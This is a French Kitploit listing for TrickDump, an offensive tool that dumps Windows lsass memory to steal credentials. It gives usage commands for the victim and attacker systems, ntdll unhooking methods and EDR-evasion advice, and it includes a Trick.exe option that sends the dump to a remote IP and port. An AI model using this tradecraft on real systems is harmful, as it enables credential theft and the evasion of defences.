Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
TrickDump — Dump lsass en utilisant uniquement les fonctions NTAPI, créant 3 fichiers JSON et 1 fichier ZIP... et générer le fichier MiniDump plus tard! | Kitploit
Outils/GitHubGitHub/ricardojoserf/trickdump
Criminalistique MémoirePost-ExploitationRed Teaming
GitHubricardojoserf/trickdump

TrickDump

Dump lsass en utilisant uniquement les fonctions NTAPI, créant 3 fichiers JSON et 1 fichier ZIP... et générer le fichier MiniDump plus tard!

Voir le dépôtSite web
56658il y a 3 joursVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

TrickDump

TrickDump vide le processus lsass sans créer de fichier Minidump, générant à la place 3 fichiers JSON et 1 fichier ZIP contenant les vidages des régions mémoire. En trois étapes :

  • Lock : Obtenir les informations du système d'exploitation à l'aide de RtlGetVersion.

  • Shock : Obtenir le privilège SeDebugPrivilege avec NtOpenProcessToken et NtAdjustPrivilegeToken, ouvrir un handle avec NtGetNextProcess et NtQueryInformationProcess, puis obtenir les informations des modules à l'aide de NtQueryInformationProcess et NtReadVirtualMemory.

  • Barrel : Obtenir le privilège SeDebugPrivilege, ouvrir un handle, puis obtenir les informations et vider les régions mémoire à l'aide de NtQueryVirtualMemory et NtReadVirtualMemory.

img

Dans le système attaquant, utilisez le script create_dump.py pour générer le fichier Minidump :

root@kitploit:~
python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE] 

Les avantages de cette technique sont :

  • Il n'y a jamais de fichier Minidump valide sur le disque, en mémoire ou dans le trafic réseau.

  • Il n'y a pas un seul programme ou processus qui exécute l'attaque complète, mais trois programmes séparés, ce qui peut déclencher moins d'alarmes.

    • Si vous préférez exécuter un seul programme, vous pouvez utiliser Trick.
    • Si vous disposez déjà d'informations sur le système d'exploitation de la machine cible, vous pouvez ignorer la première étape ("Lock").
  • Les programmes utilisent uniquement des NTAPIS (ce projet est une variante de NativeDump).

  • Il n'utilise pas OpenProcess ou NtOpenProcess pour obtenir le handle du processus lsass avec les droits d'accès PROCESS_VM_OPERATION et PROCESS_VM_WRITE.

  • Chaque programme permet d'écraser la section ".text" de la bibliothèque ntdll.dll pour contourner le hooking d'API :

    • "disk" : En utilisant une DLL déjà présente sur le disque. Si un second argument n'est pas fourni, le chemin est "C:\Windows\System32\ntdll.dll".
    • "knowndlls" : En utilisant le dossier KnownDlls.
    • "debugproc" : En utilisant un processus créé en mode débogage. Si un second argument n'est pas fourni, le processus est "c:\windows\system32\calc.exe".

Il est disponible dans différents langages :

  • .NET : La branche principale
  • Python : La branche python-flavour
  • Golang : La branche golang-flavour
  • C/C++ : La branche c-flavour
  • Fichiers BOF : La branche bof-flavour
  • Crystal : La branche crystal-flavour
  • Nim : La branche nim-flavour
  • Rust : La branche rust-flavour

Cela ne fonctionnera pas si PPL est activé, si la structure PEB est illisible ou si les binaires ne sont pas compilés en 64 bits. Mise à jour : Il est désormais possible d'exécuter les programmes sans lire le PEB, consultez la branche peb-unreadable :)

La technique fonctionne correctement sur les dernières versions de Windows et a été testée contre les solutions antivirus et EDR courantes, mais la furtivité dépendra de la "variante" que vous choisissez : utilisez des langages peu courants et personnalisez les binaires pour obtenir les meilleurs résultats !


Utilisation

Les programmes sont exécutés sur le système victime, créant trois fichiers JSON (avec les informations des régions mémoire) et un fichier zip (avec le vidage de chaque région mémoire).

root@kitploit:~
Lock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Shock.exe [disk/knowndlls/debugproc]
root@kitploit:~
Barrel.exe [disk/knowndlls/debugproc]

Vous pouvez exécuter les programmes directement sans écraser la bibliothèque ntdll.dll :

img1

Ou utiliser l'une des trois techniques d'écrasement différentes :

img2

Ensuite, le fichier Minidump est généré :

img3


Tout en un

Si vous préférez exécuter un seul binaire, Trick.exe génère un fichier ZIP contenant les 3 fichiers JSON et le fichier ZIP avec les régions mémoire :

root@kitploit:~
Trick.exe [disk/knowndlls/debugproc] [IP_ADDRESS] [PORT]

Vous pouvez créer le fichier ZIP localement, en utilisant éventuellement une méthode d'écrasement de Ntdll :

img5

Ou l'envoyer vers un port distant en utilisant le deuxième et le troisième paramètre comme adresse IP et port :

img6

Dans les deux cas, vous obtenez un fichier ZIP comme celui-ci, décompressez-le et créez le fichier Minidump :

img7

Télécharger l’outil